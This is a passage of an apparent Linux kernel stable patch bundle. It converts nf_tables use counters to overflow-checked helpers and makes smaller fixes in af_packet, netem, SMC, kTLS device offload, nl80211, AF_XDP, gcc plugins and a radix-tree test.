++	if (!nft_use_inc(&table->use))
++		return -EMFILE;
++
+ 	type = nft_obj_type_get(net, objtype);
+-	if (IS_ERR(type))
+-		return PTR_ERR(type);
++	if (IS_ERR(type)) {
++		err = PTR_ERR(type);
++		goto err_type;
++	}
+ 
+ 	obj = nft_obj_init(&ctx, type, nla[NFTA_OBJ_DATA]);
+ 	if (IS_ERR(obj)) {
+@@ -7261,7 +7289,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 		goto err_obj_ht;
+ 
+ 	list_add_tail_rcu(&obj->list, &table->objects);
+-	table->use++;
++
+ 	return 0;
+ err_obj_ht:
+ 	/* queued in transaction log */
+@@ -7277,6 +7305,9 @@ err_strdup:
+ 	kfree(obj);
+ err_init:
+ 	module_put(type->owner);
++err_type:
++	nft_use_dec_restore(&table->use);
++
+ 	return err;
+ }
+ 
+@@ -7667,7 +7698,7 @@ void nf_tables_deactivate_flowtable(const struct nft_ctx *ctx,
+ 	case NFT_TRANS_PREPARE:
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
+-		flowtable->use--;
++		nft_use_dec(&flowtable->use);
+ 		fallthrough;
+ 	default:
+ 		return;
+@@ -8015,9 +8046,14 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
++	if (!nft_use_inc(&table->use))
++		return -EMFILE;
++
+ 	flowtable = kzalloc(sizeof(*flowtable), GFP_KERNEL_ACCOUNT);
+-	if (!flowtable)
+-		return -ENOMEM;
++	if (!flowtable) {
++		err = -ENOMEM;
++		goto flowtable_alloc;
++	}
+ 
+ 	flowtable->table = table;
+ 	flowtable->handle = nf_tables_alloc_handle(table);
+@@ -8072,7 +8108,6 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 		goto err5;
+ 
+ 	list_add_tail_rcu(&flowtable->list, &table->flowtables);
+-	table->use++;
+ 
+ 	return 0;
+ err5:
+@@ -8089,6 +8124,9 @@ err2:
+ 	kfree(flowtable->name);
+ err1:
+ 	kfree(flowtable);
++flowtable_alloc:
++	nft_use_dec_restore(&table->use);
++
+ 	return err;
+ }
+ 
+@@ -9374,7 +9412,7 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 				 */
+ 				if (nft_set_is_anonymous(nft_trans_set(trans)) &&
+ 				    !list_empty(&nft_trans_set(trans)->bindings))
+-					trans->ctx.table->use--;
++					nft_use_dec(&trans->ctx.table->use);
+ 			}
+ 			nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),
+ 					     NFT_MSG_NEWSET, GFP_KERNEL);
+@@ -9593,7 +9631,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 					nft_trans_destroy(trans);
+ 					break;
+ 				}
+-				trans->ctx.table->use--;
++				nft_use_dec_restore(&trans->ctx.table->use);
+ 				nft_chain_del(trans->ctx.chain);
+ 				nf_tables_unregister_hook(trans->ctx.net,
+ 							  trans->ctx.table,
+@@ -9601,7 +9639,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			}
+ 			break;
+ 		case NFT_MSG_DELCHAIN:
+-			trans->ctx.table->use++;
++			nft_use_inc_restore(&trans->ctx.table->use);
+ 			nft_clear(trans->ctx.net, trans->ctx.chain);
+ 			nft_trans_destroy(trans);
+ 			break;
+@@ -9610,7 +9648,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_trans_destroy(trans);
+ 				break;
+ 			}
+-			trans->ctx.chain->use--;
++			nft_use_dec_restore(&trans->ctx.chain->use);
+ 			list_del_rcu(&nft_trans_rule(trans)->list);
+ 			nft_rule_expr_deactivate(&trans->ctx,
+ 						 nft_trans_rule(trans),
+@@ -9619,7 +9657,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_flow_rule_destroy(nft_trans_flow_rule(trans));
+ 			break;
+ 		case NFT_MSG_DELRULE:
+-			trans->ctx.chain->use++;
++			nft_use_inc_restore(&trans->ctx.chain->use);
+ 			nft_clear(trans->ctx.net, nft_trans_rule(trans));
+ 			nft_rule_expr_activate(&trans->ctx, nft_trans_rule(trans));
+ 			if (trans->ctx.chain->flags & NFT_CHAIN_HW_OFFLOAD)
+@@ -9632,7 +9670,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_trans_destroy(trans);
+ 				break;
+ 			}
+-			trans->ctx.table->use--;
++			nft_use_dec_restore(&trans->ctx.table->use);
+ 			if (nft_trans_set_bound(trans)) {
+ 				nft_trans_destroy(trans);
+ 				break;
+@@ -9640,7 +9678,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			list_del_rcu(&nft_trans_set(trans)->list);
+ 			break;
+ 		case NFT_MSG_DELSET:
+-			trans->ctx.table->use++;
++			nft_use_inc_restore(&trans->ctx.table->use);
+ 			nft_clear(trans->ctx.net, nft_trans_set(trans));
+ 			if (nft_trans_set(trans)->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
+ 				nft_map_activate(&trans->ctx, nft_trans_set(trans));
+@@ -9683,12 +9721,12 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_obj_destroy(&trans->ctx, nft_trans_obj_newobj(trans));
+ 				nft_trans_destroy(trans);
+ 			} else {
+-				trans->ctx.table->use--;
++				nft_use_dec_restore(&trans->ctx.table->use);
+ 				nft_obj_del(nft_trans_obj(trans));
+ 			}
+ 			break;
+ 		case NFT_MSG_DELOBJ:
+-			trans->ctx.table->use++;
++			nft_use_inc_restore(&trans->ctx.table->use);
+ 			nft_clear(trans->ctx.net, nft_trans_obj(trans));
+ 			nft_trans_destroy(trans);
+ 			break;
+@@ -9697,7 +9735,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_unregister_flowtable_net_hooks(net,
+ 						&nft_trans_flowtable_hooks(trans));
+ 			} else {
+-				trans->ctx.table->use--;
++				nft_use_dec_restore(&trans->ctx.table->use);
+ 				list_del_rcu(&nft_trans_flowtable(trans)->list);
+ 				nft_unregister_flowtable_net_hooks(net,
+ 						&nft_trans_flowtable(trans)->hook_list);
+@@ -9708,7 +9746,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				list_splice(&nft_trans_flowtable_hooks(trans),
+ 					    &nft_trans_flowtable(trans)->hook_list);
+ 			} else {
+-				trans->ctx.table->use++;
++				nft_use_inc_restore(&trans->ctx.table->use);
+ 				nft_clear(trans->ctx.net, nft_trans_flowtable(trans));
+ 			}
+ 			nft_trans_destroy(trans);
+@@ -10161,8 +10199,9 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 		if (desc->flags & NFT_DATA_DESC_SETELEM &&
+ 		    chain->flags & NFT_CHAIN_BINDING)
+ 			return -EINVAL;
++		if (!nft_use_inc(&chain->use))
++			return -EMFILE;
+ 
+-		chain->use++;
+ 		data->verdict.chain = chain;
+ 		break;
+ 	}
+@@ -10180,7 +10219,7 @@ static void nft_verdict_uninit(const struct nft_data *data)
+ 	case NFT_JUMP:
+ 	case NFT_GOTO:
+ 		chain = data->verdict.chain;
+-		chain->use--;
++		nft_use_dec(&chain->use);
+ 		break;
+ 	}
+ }
+@@ -10349,11 +10388,11 @@ int __nft_release_basechain(struct nft_ctx *ctx)
+ 	nf_tables_unregister_hook(ctx->net, ctx->chain->table, ctx->chain);
+ 	list_for_each_entry_safe(rule, nr, &ctx->chain->rules, list) {
+ 		list_del(&rule->list);
+-		ctx->chain->use--;
++		nft_use_dec(&ctx->chain->use);
+ 		nf_tables_rule_release(ctx, rule);
+ 	}
+ 	nft_chain_del(ctx->chain);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 	nf_tables_chain_destroy(ctx);
+ 
+ 	return 0;
+@@ -10406,18 +10445,18 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 		ctx.chain = chain;
+ 		list_for_each_entry_safe(rule, nr, &chain->rules, list) {
+ 			list_del(&rule->list);
+-			chain->use--;
++			nft_use_dec(&chain->use);
+ 			nf_tables_rule_release(&ctx, rule);
+ 		}
+ 	}
+ 	list_for_each_entry_safe(flowtable, nf, &table->flowtables, list) {
+ 		list_del(&flowtable->list);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		nf_tables_flowtable_destroy(flowtable);
+ 	}
+ 	list_for_each_entry_safe(set, ns, &table->sets, list) {
+ 		list_del(&set->list);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
+ 			nft_map_deactivate(&ctx, set);
+ 
+@@ -10425,13 +10464,13 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	}
+ 	list_for_each_entry_safe(obj, ne, &table->objects, list) {
+ 		nft_obj_del(obj);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		nft_obj_destroy(&ctx, obj);
+ 	}
+ 	list_for_each_entry_safe(chain, nc, &table->chains, list) {
+ 		ctx.chain = chain;
+ 		nft_chain_del(chain);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		nf_tables_chain_destroy(&ctx);
+ 	}
+ 	nf_tables_table_destroy(&ctx);
+diff --git a/net/netfilter/nft_flow_offload.c b/net/netfilter/nft_flow_offload.c
+index a25c88bc8b750..8a43f6f9c90b6 100644
+--- a/net/netfilter/nft_flow_offload.c
++++ b/net/netfilter/nft_flow_offload.c
+@@ -404,8 +404,10 @@ static int nft_flow_offload_init(const struct nft_ctx *ctx,
+ 	if (IS_ERR(flowtable))
+ 		return PTR_ERR(flowtable);
+ 
++	if (!nft_use_inc(&flowtable->use))
++		return -EMFILE;
++
+ 	priv->flowtable = flowtable;
+-	flowtable->use++;
+ 
+ 	return nf_ct_netns_get(ctx->net, ctx->family);
+ }
+@@ -424,7 +426,7 @@ static void nft_flow_offload_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_flow_offload *priv = nft_expr_priv(expr);
+ 
+-	priv->flowtable->use++;
++	nft_use_inc_restore(&priv->flowtable->use);
+ }
+ 
+ static void nft_flow_offload_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 391c18e4b3ebd..5f59dbab3e933 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
+@@ -168,7 +168,7 @@ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 				nft_immediate_chain_deactivate(ctx, chain, phase);
+ 				nft_chain_del(chain);
+ 				chain->bound = false;
+-				chain->table->use--;
++				nft_use_dec(&chain->table->use);
+ 				break;
+ 			}
+ 			break;
+@@ -207,7 +207,7 @@ static void nft_immediate_destroy(const struct nft_ctx *ctx,
+ 		 * let the transaction records release this chain and its rules.
+ 		 */
+ 		if (chain->bound) {
+-			chain->use--;
++			nft_use_dec(&chain->use);
+ 			break;
+ 		}
+ 
+@@ -215,9 +215,9 @@ static void nft_immediate_destroy(const struct nft_ctx *ctx,
+ 		chain_ctx = *ctx;
+ 		chain_ctx.chain = chain;
+ 
+-		chain->use--;
++		nft_use_dec(&chain->use);
+ 		list_for_each_entry_safe(rule, n, &chain->rules, list) {
+-			chain->use--;
++			nft_use_dec(&chain->use);
+ 			list_del(&rule->list);
+ 			nf_tables_rule_destroy(&chain_ctx, rule);
+ 		}
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index 7f8e480b6be5b..0017bd3418722 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -41,8 +41,10 @@ static int nft_objref_init(const struct nft_ctx *ctx,
+ 	if (IS_ERR(obj))
+ 		return -ENOENT;
+ 
++	if (!nft_use_inc(&obj->use))
++		return -EMFILE;
++
+ 	nft_objref_priv(expr) = obj;
+-	obj->use++;
+ 
+ 	return 0;
+ }
+@@ -71,7 +73,7 @@ static void nft_objref_deactivate(const struct nft_ctx *ctx,
+ 	if (phase == NFT_TRANS_COMMIT)
+ 		return;
+ 
+-	obj->use--;
++	nft_use_dec(&obj->use);
+ }
+ 
+ static void nft_objref_activate(const struct nft_ctx *ctx,
+@@ -79,7 +81,7 @@ static void nft_objref_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_object *obj = nft_objref_priv(expr);
+ 
+-	obj->use++;
++	nft_use_inc_restore(&obj->use);
+ }
+ 
+ static struct nft_expr_type nft_objref_type;
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 1681068400733..451bd8bfafd23 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -404,18 +404,20 @@ static void __packet_set_status(struct packet_sock *po, void *frame, int status)
+ {
+ 	union tpacket_uhdr h;
+ 
++	/* WRITE_ONCE() are paired with READ_ONCE() in __packet_get_status */
++
+ 	h.raw = frame;
+ 	switch (po->tp_version) {
+ 	case TPACKET_V1:
+-		h.h1->tp_status = status;
++		WRITE_ONCE(h.h1->tp_status, status);
+ 		flush_dcache_page(pgv_to_page(&h.h1->tp_status));
+ 		break;
+ 	case TPACKET_V2:
+-		h.h2->tp_status = status;
++		WRITE_ONCE(h.h2->tp_status, status);
+ 		flush_dcache_page(pgv_to_page(&h.h2->tp_status));
+ 		break;
+ 	case TPACKET_V3:
+-		h.h3->tp_status = status;
++		WRITE_ONCE(h.h3->tp_status, status);
+ 		flush_dcache_page(pgv_to_page(&h.h3->tp_status));
+ 		break;
+ 	default:
+@@ -432,17 +434,19 @@ static int __packet_get_status(const struct packet_sock *po, void *frame)
+ 
+ 	smp_rmb();
+ 
++	/* READ_ONCE() are paired with WRITE_ONCE() in __packet_set_status */
++
+ 	h.raw = frame;
+ 	switch (po->tp_version) {
+ 	case TPACKET_V1:
+ 		flush_dcache_page(pgv_to_page(&h.h1->tp_status));
+-		return h.h1->tp_status;
++		return READ_ONCE(h.h1->tp_status);
+ 	case TPACKET_V2:
+ 		flush_dcache_page(pgv_to_page(&h.h2->tp_status));
+-		return h.h2->tp_status;
++		return READ_ONCE(h.h2->tp_status);
+ 	case TPACKET_V3:
+ 		flush_dcache_page(pgv_to_page(&h.h3->tp_status));
+-		return h.h3->tp_status;
++		return READ_ONCE(h.h3->tp_status);
+ 	default:
+ 		WARN(1, "TPACKET version not supported.\n");
+ 		BUG();
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index aa9842158df0a..d0e045116d4e9 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -773,12 +773,10 @@ static void dist_free(struct disttable *d)
+  * signed 16 bit values.
+  */
+ 
+-static int get_dist_table(struct Qdisc *sch, struct disttable **tbl,
+-			  const struct nlattr *attr)
++static int get_dist_table(struct disttable **tbl, const struct nlattr *attr)
+ {
+ 	size_t n = nla_len(attr)/sizeof(__s16);
+ 	const __s16 *data = nla_data(attr);
+-	spinlock_t *root_lock;
+ 	struct disttable *d;
+ 	int i;
+ 
+@@ -793,13 +791,7 @@ static int get_dist_table(struct Qdisc *sch, struct disttable **tbl,
+ 	for (i = 0; i < n; i++)
+ 		d->table[i] = data[i];
+ 
+-	root_lock = qdisc_root_sleeping_lock(sch);
+-
+-	spin_lock_bh(root_lock);
+-	swap(*tbl, d);
+-	spin_unlock_bh(root_lock);
+-
+-	dist_free(d);
++	*tbl = d;
+ 	return 0;
+ }
+ 
+@@ -956,6 +948,8 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ {
+ 	struct netem_sched_data *q = qdisc_priv(sch);
+ 	struct nlattr *tb[TCA_NETEM_MAX + 1];
++	struct disttable *delay_dist = NULL;
++	struct disttable *slot_dist = NULL;
+ 	struct tc_netem_qopt *qopt;
+ 	struct clgstate old_clg;
+ 	int old_loss_model = CLG_RANDOM;
+@@ -966,6 +960,18 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (tb[TCA_NETEM_DELAY_DIST]) {
++		ret = get_dist_table(&delay_dist, tb[TCA_NETEM_DELAY_DIST]);
++		if (ret)
++			goto table_free;
++	}
++
++	if (tb[TCA_NETEM_SLOT_DIST]) {
++		ret = get_dist_table(&slot_dist, tb[TCA_NETEM_SLOT_DIST]);
++		if (ret)
++			goto table_free;
++	}
++
+ 	sch_tree_lock(sch);
+ 	/* backup q->clg and q->loss_model */
+ 	old_clg = q->clg;
+@@ -975,26 +981,17 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 		ret = get_loss_clg(q, tb[TCA_NETEM_LOSS]);
+ 		if (ret) {
+ 			q->loss_model = old_loss_model;
++			q->clg = old_clg;
+ 			goto unlock;
+ 		}
+ 	} else {
+ 		q->loss_model = CLG_RANDOM;
+ 	}
+ 
+-	if (tb[TCA_NETEM_DELAY_DIST]) {
+-		ret = get_dist_table(sch, &q->delay_dist,
+-				     tb[TCA_NETEM_DELAY_DIST]);
+-		if (ret)
+-			goto get_table_failure;
+-	}
+-
+-	if (tb[TCA_NETEM_SLOT_DIST]) {
+-		ret = get_dist_table(sch, &q->slot_dist,
+-				     tb[TCA_NETEM_SLOT_DIST]);
+-		if (ret)
+-			goto get_table_failure;
+-	}
+-
++	if (delay_dist)
++		swap(q->delay_dist, delay_dist);
++	if (slot_dist)
++		swap(q->slot_dist, slot_dist);
+ 	sch->limit = qopt->limit;
+ 
+ 	q->latency = PSCHED_TICKS2NS(qopt->latency);
+@@ -1044,17 +1041,11 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 
+ unlock:
+ 	sch_tree_unlock(sch);
+-	return ret;
+ 
+-get_table_failure:
+-	/* recover clg and loss_model, in case of
+-	 * q->clg and q->loss_model were modified
+-	 * in get_loss_clg()
+-	 */
+-	q->clg = old_clg;
+-	q->loss_model = old_loss_model;
+-
+-	goto unlock;
++table_free:
++	dist_free(delay_dist);
++	dist_free(slot_dist);
++	return ret;
+ }
+ 
+ static int netem_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 5ae0a54a823b5..5712a5297bd01 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -438,13 +438,60 @@ out:
+ 	return rc;
+ }
+ 
++/* copy only relevant settings and flags of SOL_SOCKET level from smc to
++ * clc socket (since smc is not called for these options from net/core)
++ */
++
++#define SK_FLAGS_SMC_TO_CLC ((1UL << SOCK_URGINLINE) | \
++			     (1UL << SOCK_KEEPOPEN) | \
++			     (1UL << SOCK_LINGER) | \
++			     (1UL << SOCK_BROADCAST) | \
++			     (1UL << SOCK_TIMESTAMP) | \
++			     (1UL << SOCK_DBG) | \
++			     (1UL << SOCK_RCVTSTAMP) | \
++			     (1UL << SOCK_RCVTSTAMPNS) | \
++			     (1UL << SOCK_LOCALROUTE) | \
++			     (1UL << SOCK_TIMESTAMPING_RX_SOFTWARE) | \
++			     (1UL << SOCK_RXQ_OVFL) | \
++			     (1UL << SOCK_WIFI_STATUS) | \
++			     (1UL << SOCK_NOFCS) | \
++			     (1UL << SOCK_FILTER_LOCKED) | \
++			     (1UL << SOCK_TSTAMP_NEW))
++
++/* if set, use value set by setsockopt() - else use IPv4 or SMC sysctl value */
++static void smc_adjust_sock_bufsizes(struct sock *nsk, struct sock *osk,
++				     unsigned long mask)
++{
++	struct net *nnet = sock_net(nsk);
++
++	nsk->sk_userlocks = osk->sk_userlocks;
++	if (osk->sk_userlocks & SOCK_SNDBUF_LOCK) {
++		nsk->sk_sndbuf = osk->sk_sndbuf;
++	} else {
++		if (mask == SK_FLAGS_SMC_TO_CLC)
++			WRITE_ONCE(nsk->sk_sndbuf,
++				   READ_ONCE(nnet->ipv4.sysctl_tcp_wmem[1]));
++		else
++			WRITE_ONCE(nsk->sk_sndbuf,
++				   2 * READ_ONCE(nnet->smc.sysctl_wmem));
++	}
++	if (osk->sk_userlocks & SOCK_RCVBUF_LOCK) {
++		nsk->sk_rcvbuf = osk->sk_rcvbuf;
++	} else {
++		if (mask == SK_FLAGS_SMC_TO_CLC)
++			WRITE_ONCE(nsk->sk_rcvbuf,
++				   READ_ONCE(nnet->ipv4.sysctl_tcp_rmem[1]));
++		else
++			WRITE_ONCE(nsk->sk_rcvbuf,
++				   2 * READ_ONCE(nnet->smc.sysctl_rmem));
++	}
++}
++
+ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+ 				   unsigned long mask)
+ {
+ 	/* options we don't get control via setsockopt for */
+ 	nsk->sk_type = osk->sk_type;
+-	nsk->sk_sndbuf = osk->sk_sndbuf;
+-	nsk->sk_rcvbuf = osk->sk_rcvbuf;
+ 	nsk->sk_sndtimeo = osk->sk_sndtimeo;
+ 	nsk->sk_rcvtimeo = osk->sk_rcvtimeo;
+ 	nsk->sk_mark = READ_ONCE(osk->sk_mark);
+@@ -455,26 +502,10 @@ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+ 
+ 	nsk->sk_flags &= ~mask;
+ 	nsk->sk_flags |= osk->sk_flags & mask;
++
++	smc_adjust_sock_bufsizes(nsk, osk, mask);
+ }
+ 
+-#define SK_FLAGS_SMC_TO_CLC ((1UL << SOCK_URGINLINE) | \
+-			     (1UL << SOCK_KEEPOPEN) | \
+-			     (1UL << SOCK_LINGER) | \
+-			     (1UL << SOCK_BROADCAST) | \
+-			     (1UL << SOCK_TIMESTAMP) | \
+-			     (1UL << SOCK_DBG) | \
+-			     (1UL << SOCK_RCVTSTAMP) | \
+-			     (1UL << SOCK_RCVTSTAMPNS) | \
+-			     (1UL << SOCK_LOCALROUTE) | \
+-			     (1UL << SOCK_TIMESTAMPING_RX_SOFTWARE) | \
+-			     (1UL << SOCK_RXQ_OVFL) | \
+-			     (1UL << SOCK_WIFI_STATUS) | \
+-			     (1UL << SOCK_NOFCS) | \
+-			     (1UL << SOCK_FILTER_LOCKED) | \
+-			     (1UL << SOCK_TSTAMP_NEW))
+-/* copy only relevant settings and flags of SOL_SOCKET level from smc to
+- * clc socket (since smc is not called for these options from net/core)
+- */
+ static void smc_copy_sock_settings_to_clc(struct smc_sock *smc)
+ {
+ 	smc_copy_sock_settings(smc->clcsock->sk, &smc->sk, SK_FLAGS_SMC_TO_CLC);
+@@ -2466,8 +2497,6 @@ static void smc_tcp_listen_work(struct work_struct *work)
+ 		sock_hold(lsk); /* sock_put in smc_listen_work */
+ 		INIT_WORK(&new_smc->smc_listen_work, smc_listen_work);
+ 		smc_copy_sock_settings_to_smc(new_smc);
+-		new_smc->sk.sk_sndbuf = lsmc->sk.sk_sndbuf;
+-		new_smc->sk.sk_rcvbuf = lsmc->sk.sk_rcvbuf;
+ 		sock_hold(&new_smc->sk); /* sock_put in passive closing */
+ 		if (!queue_work(smc_hs_wq, &new_smc->smc_listen_work))
+ 			sock_put(&new_smc->sk);
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index bf69c9d6d06c0..1849827884735 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -52,6 +52,8 @@ static LIST_HEAD(tls_device_list);
+ static LIST_HEAD(tls_device_down_list);
+ static DEFINE_SPINLOCK(tls_device_lock);
+ 
++static struct page *dummy_page;
++
+ static void tls_device_free_ctx(struct tls_context *ctx)
+ {
+ 	if (ctx->tx_conf == TLS_HW) {
+@@ -313,36 +315,33 @@ static int tls_push_record(struct sock *sk,
+ 	return tls_push_sg(sk, ctx, offload_ctx->sg_tx_data, 0, flags);
+ }
+ 
+-static int tls_device_record_close(struct sock *sk,
+-				   struct tls_context *ctx,
+-				   struct tls_record_info *record,
+-				   struct page_frag *pfrag,
+-				   unsigned char record_type)
++static void tls_device_record_close(struct sock *sk,
++				    struct tls_context *ctx,
++				    struct tls_record_info *record,
++				    struct page_frag *pfrag,
++				    unsigned char record_type)
+ {
+ 	struct tls_prot_info *prot = &ctx->prot_info;
+-	int ret;
++	struct page_frag dummy_tag_frag;
+ 
+ 	/* append tag
+ 	 * device will fill in the tag, we just need to append a placeholder
+ 	 * use socket memory to improve coalescing (re-using a single buffer
+ 	 * increases frag count)
+-	 * if we can't allocate memory now, steal some back from data
++	 * if we can't allocate memory now use the dummy page
+ 	 */
+-	if (likely(skb_page_frag_refill(prot->tag_size, pfrag,
+-					sk->sk_allocation))) {
+-		ret = 0;
+-		tls_append_frag(record, pfrag, prot->tag_size);
+-	} else {
+-		ret = prot->tag_size;
+-		if (record->len <= prot->overhead_size)
+-			return -ENOMEM;
++	if (unlikely(pfrag->size - pfrag->offset < prot->tag_size) &&
++	    !skb_page_frag_refill(prot->tag_size, pfrag, sk->sk_allocation)) {
++		dummy_tag_frag.page = dummy_page;
++		dummy_tag_frag.offset = 0;
++		pfrag = &dummy_tag_frag;
+ 	}
++	tls_append_frag(record, pfrag, prot->tag_size);
+ 
+ 	/* fill prepend */
+ 	tls_fill_prepend(ctx, skb_frag_address(&record->frags[0]),
+ 			 record->len - prot->overhead_size,
+ 			 record_type);
+-	return ret;
+ }
+ 
+ static int tls_create_new_record(struct tls_offload_context_tx *offload_ctx,
+@@ -535,18 +534,8 @@ last_record:
+ 
+ 		if (done || record->len >= max_open_record_len ||
+ 		    (record->num_frags >= MAX_SKB_FRAGS - 1)) {
+-			rc = tls_device_record_close(sk, tls_ctx, record,
+-						     pfrag, record_type);
+-			if (rc) {
+-				if (rc > 0) {
+-					size += rc;
+-				} else {
+-					size = orig_size;
+-					destroy_record(record);
+-					ctx->open_record = NULL;
+-					break;
+-				}
+-			}
++			tls_device_record_close(sk, tls_ctx, record,
++						pfrag, record_type);
+ 
+ 			rc = tls_push_record(sk,
+ 					     tls_ctx,
+@@ -1466,14 +1455,26 @@ int __init tls_device_init(void)
+ {
+ 	int err;
+ 
+-	destruct_wq = alloc_workqueue("ktls_device_destruct", 0, 0);
+-	if (!destruct_wq)
++	dummy_page = alloc_page(GFP_KERNEL);
++	if (!dummy_page)
+ 		return -ENOMEM;
+ 
++	destruct_wq = alloc_workqueue("ktls_device_destruct", 0, 0);
++	if (!destruct_wq) {
++		err = -ENOMEM;
++		goto err_free_dummy;
++	}
++
+ 	err = register_netdevice_notifier(&tls_dev_notifier);
+ 	if (err)
+-		destroy_workqueue(destruct_wq);
++		goto err_destroy_wq;
+ 
++	return 0;
++
++err_destroy_wq:
++	destroy_workqueue(destruct_wq);
++err_free_dummy:
++	put_page(dummy_page);
+ 	return err;
+ }
+ 
+@@ -1482,4 +1483,5 @@ void __exit tls_device_cleanup(void)
+ 	unregister_netdevice_notifier(&tls_dev_notifier);
+ 	destroy_workqueue(destruct_wq);
+ 	clean_acked_data_flush();
++	put_page(dummy_page);
+ }
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 087c0c442e231..c2363d44a1ffc 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -5378,8 +5378,11 @@ nl80211_parse_mbssid_elems(struct wiphy *wiphy, struct nlattr *attrs)
+ 	if (!wiphy->mbssid_max_interfaces)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	nla_for_each_nested(nl_elems, attrs, rem_elems)
++	nla_for_each_nested(nl_elems, attrs, rem_elems) {
++		if (num_elems >= 255)
++			return ERR_PTR(-EINVAL);
+ 		num_elems++;
++	}
+ 
+ 	elems = kzalloc(struct_size(elems, elem, num_elems), GFP_KERNEL);
+ 	if (!elems)
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 22bf10ffbf2d1..f7592638e61d3 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -994,6 +994,7 @@ static int xsk_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
+ 				err = xp_alloc_tx_descs(xs->pool, xs);
+ 				if (err) {
+ 					xp_put_pool(xs->pool);
++					xs->pool = NULL;
+ 					sockfd_put(sock);
+ 					goto out_unlock;
+ 				}
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 9a1895747b153..84c730da36dd3 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -71,7 +71,9 @@
+ #include "varasm.h"
+ #include "stor-layout.h"
+ #include "internal-fn.h"
++#include "gimple.h"
+ #include "gimple-expr.h"
++#include "gimple-iterator.h"
+ #include "gimple-fold.h"
+ #include "context.h"
+ #include "tree-ssa-alias.h"
+@@ -85,10 +87,8 @@
+ #include "tree-eh.h"
+ #include "stmt.h"
+ #include "gimplify.h"
+-#include "gimple.h"
+ #include "tree-phinodes.h"
+ #include "tree-cfg.h"
+-#include "gimple-iterator.h"
+ #include "gimple-ssa.h"
+ #include "ssa-iterators.h"
+ 
+diff --git a/tools/testing/radix-tree/regression1.c b/tools/testing/radix-tree/regression1.c
+index a61c7bcbc72da..63f468bf8245c 100644
+--- a/tools/testing/radix-tree/regression1.c
++++ b/tools/testing/radix-tree/regression1.c
+@@ -177,7 +177,7 @@ void regression1_test(void)
+ 	nr_threads = 2;
+ 	pthread_barrier_init(&worker_barrier, NULL, nr_threads);
+ 
+-	threads = malloc(nr_threads * sizeof(pthread_t *));
++	threads = malloc(nr_threads * sizeof(*threads));
+ 
+ 	for (i = 0; i < nr_threads; i++) {
+ 		arg = i;
+diff --git a/tools/testing/selftests/net/fib_nexthops.sh b/tools/testing/selftests/net/fib_nexthops.sh
+index 0f5e88c8f4ffe..df8d90b51867a 100755
+--- a/tools/testing/selftests/net/fib_nexthops.sh
++++ b/tools/testing/selftests/net/fib_nexthops.sh
+@@ -1981,6 +1981,11 @@ basic()
+ 
